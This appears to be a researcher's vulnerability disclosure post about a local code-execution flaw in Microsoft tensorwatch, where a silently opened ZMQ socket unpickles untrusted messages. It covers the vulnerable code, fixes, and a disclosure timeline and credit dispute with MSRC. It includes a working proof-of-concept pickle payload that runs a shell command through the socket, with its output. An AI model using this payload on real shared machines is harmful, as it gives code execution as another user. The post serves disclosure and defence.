Microsoft tensorwatch: Local Code Execution via Pickle Deserialization in ZMQ Listener

Introduction

The last finding in my pickle deserialization audit is a quieter one. tensorwatch, Microsoft’s debugging and visualization tool for ML training with 3,463 stars, has a local code execution vulnerability that triggers from the very first line in every README example.

When you call tw.Watcher(), it silently creates a ZMQ REP socket on tcp://127.0.0.1:41459 in a background thread. That socket deserializes incoming messages with pickle.loads() - no auth, no validation. Any user on the same machine can connect and get code execution.

Target: microsoft/tensorwatch Stars: 3,463 Package: tensorwatch 0.9.1 on PyPI Severity: High (CVSS 3.1: 7.8 - Local only)

What is tensorwatch?

tensorwatch is a Microsoft Research project for debugging, monitoring, and visualizing ML (Machine Learning) training. It provides real-time visualization of training metrics, model architecture inspection, and dataset exploration. The core API starts with tw.Watcher(), which creates a monitoring context that communicates over ZMQ sockets.

The project hasn’t had a code commit in over two years (the last change was a README update in September 2025).

The Vulnerability

The vulnerable code is in tensorwatch/zmq_wrapper.py. When tw.Watcher() is instantiated, it creates a ClientServer object that binds a ZMQ REP socket:

Lines 236-257:

def _connect(self, port, is_server, callback, host):
    def callback_wrapper(callback, msg):
        [obj_s] = msg
        ret = callback(self, pickle.loads(obj_s))  # line 242 - RCE
        self._socket.send_multipart([pickle.dumps((ret, None))])

    if is_server:
        host = host or '127.0.0.1'       # localhost by default
        self._socket = context.socket(zmq.REP)
        self._socket.bind('tcp://%s:%d' % (host, port))

The callback runs in a background I/O thread via Tornado’s IOLoop. When a message arrives on the REP socket, it’s deserialized with pickle.loads() and passed to the callback function. The deserialization happens before any callback logic.

The default port is 41459, defined in lv_types.py as DefaultPorts.CliSrv.

What the User Sees

Nothing. That’s the problem. Here’s the typical tensorwatch usage from the README:

import tensorwatch as tw
w = tw.Watcher()  # This silently opens a network socket

# ... training loop with w.observe() calls ...

The user doesn’t know that tw.Watcher() just opened a ZMQ REP socket on port 41459. There’s no log message, no warning, no documentation about the socket. It runs in a background thread and silently accepts connections.

The PUB Socket (Not Vulnerable)

There’s also a Publication PUB socket on port 40859 that binds to tcp://* (all interfaces) by default. However, ZMQ PUB sockets only send data - they can’t receive attacker-controlled input. So while the PUB socket is network-exposed, it’s not exploitable for RCE.

Proof of Concept

Setting Up the Target

Tested against real tensorwatch==0.9.1 from PyPI. Zero code modifications:

pip install tensorwatch==0.9.1
python -c "import tensorwatch as tw; w = tw.Watcher(); input('Running...')"

That’s it. The ZMQ REP socket is now listening on tcp://127.0.0.1:41459.

The Exploit

From a second terminal on the same machine:

import zmq, pickle, os

class RCE:
    def __reduce__(self):
        return (os.system, ('id > /tmp/tensorwatch_pwned',))

ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect('tcp://127.0.0.1:41459')
sock.send_multipart([pickle.dumps(RCE())])

Result

$ cat /tmp/tensorwatch_pwned
uid=1000(chocapikk) gid=1001(chocapikk) groups=1001(chocapikk),4(adm),24(cdrom),27(sudo),...

Attack Surface

Because the REP socket binds to 127.0.0.1, exploitation is limited to local scenarios:

Shared GPU servers - the most common case. Multi-user research clusters where multiple researchers share the same machine. If one user is running tensorwatch, any other user can connect to the socket and execute commands as that user.
Containers with host networking - Docker --network host shares the host’s network namespace, exposing localhost ports across containers.
Misconfigured deployments - if a user passes host='*' or host='0.0.0.0' to the Watcher constructor, the socket becomes network-accessible.

The port 41459 is hardcoded and predictable, so an attacker doesn’t need to scan - they know exactly where to connect.

Microsoft’s Security Notice

In September 2025, Microsoft added a security notice to the tensorwatch README:

Security Warning: Be careful when loading pickle files from untrusted sources…

This notice only addresses loading .pkl files from disk. It doesn’t mention the ZMQ socket that tw.Watcher() opens, which is a completely different attack surface. The README warning and the vulnerability I’m reporting are unrelated.

Suggested Fix

Replace pickle.loads() with JSON or MessagePack for the ZMQ RPC protocol. The messages are monitoring data - metrics, tensor shapes, log entries - that don’t require pickle serialization.
Add ZMQ CURVE authentication to the REP socket.
Make the socket opt-in. Don’t silently open a network socket on tw.Watcher(). Require explicit configuration to enable the ZMQ listener.
If pickle is required, use a RestrictedUnpickler with an explicit allowlist.

Realistically, given that the project has been unmaintained for over two years (the September 2025 README update was the only change), a fix is unlikely. Users should be aware that calling tw.Watcher() opens a local attack surface.

Timeline

2025-09-27: Microsoft adds security notice to README (6fe1359) - covers only .pkl files, not ZMQ surface
2026-02-10: ZMQ vulnerability discovered and confirmed via PoC against real tensorwatch 0.9.1 from PyPI
2026-02-11: CVE request submitted to VulnCheck
2026-02-12: VulnCheck initiates outreach to MSRC, 120-day deadline set (June 12, 2026)
2026-03-06: Microsoft silently fixes the ZMQ pickle deserialization with HMAC-SHA256 signing (2fe6ed3) - no CVE, no credit
2026-03-17: Additional hardening: RestrictedUnpickler, HMAC env var sharing, YAML SafeLoader (afe9390, 9bc973b, f286895)
2026-03-27: MSRC marks report as “duplicate” without issuing a CVE or crediting the reporter
2026-03-30: Microsoft switches RestrictedUnpickler from blocklist to allowlist (da2df33) - exact approach from our suggested fix
2026-04-23: MSRC marks case as “Completed” without further comment. VulnCheck closes CVD request. Public disclosure.

What Actually Happened

After our report through VulnCheck on February 12, 2026, MSRC was contacted with a 120-day disclosure deadline.

Three weeks later, on March 6, Microsoft pushed a commit titled “fix unsafe pickle deserialization vulnerability in ZMQ transport” - implementing HMAC-SHA256 verification on all ZMQ messages and binding to localhost by default. Over the following weeks, they added a RestrictedUnpickler with an allowlist, environment variable key sharing, and YAML hardening. Each commit directly addresses the attack surface described in our report.

Despite the fix clearly corresponding to our report:

MSRC marked the submission as a “duplicate” without identifying the original report
No CVE was issued
No credit was given to the reporter
The case was marked “Completed” without explanation

The commit history speaks for itself. The project had zero security-related code changes from its creation until September 2025 (README-only notice). Within three weeks of our report reaching MSRC, the exact vulnerability surface we documented received a multi-commit security hardening effort implementing the exact mitigations we suggested.

Takeaways

tensorwatch is different from the other vulnerabilities in this series. It’s local-only (CVSS 7.8 instead of 9.8), and the ZMQ attack surface is now mitigated in the latest code.

The real issue is the silent socket. tw.Watcher() is the first line in every README example, the entry point to the entire library, and it opens a network listener without telling the user. On shared GPU servers where multiple researchers use the same machine, that’s a real attack surface that nobody knows is there.

The secondary issue is the vulnerability coordination process. When a vendor silently fixes a reported vulnerability, marks the report as “duplicate” without evidence, and closes the case without a CVE or credit, it discourages responsible disclosure. The fix commits are timestamped. The report is timestamped. The timeline is clear.